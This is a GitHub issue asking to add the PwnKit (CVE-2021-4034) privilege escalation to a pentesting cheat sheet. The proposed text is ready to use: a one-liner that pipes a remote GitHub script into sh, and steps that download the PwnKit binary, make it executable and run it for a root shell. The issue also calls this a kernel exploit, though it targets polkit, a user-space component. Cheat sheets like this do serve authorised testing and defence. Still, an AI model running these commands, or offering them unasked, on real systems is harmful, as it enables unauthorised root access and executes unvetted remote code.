Skip to content

Missing popular Linux kernel exploit #1

@OckTheOctopus

Description

@OckTheOctopus

Is your feature request related to a problem? Please describe.
The section Common Kernel Exploits is missing the PwnKit (CVE-2021-4034) kernel exploit

Describe the solution you'd like
Include the PwnKit exploit in the cheat sheet. Sample text:

# PwnKit (CVE-2021-4034) - All PolKit versions earlier than version 121
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)" # Automatic exploit

# Manual exploit
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command

Describe alternatives you've considered
Speaking to the author over teams, to which he laughed.

Additional context
PwnKit Proof of Concept
CVE-2021-4034 Details

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions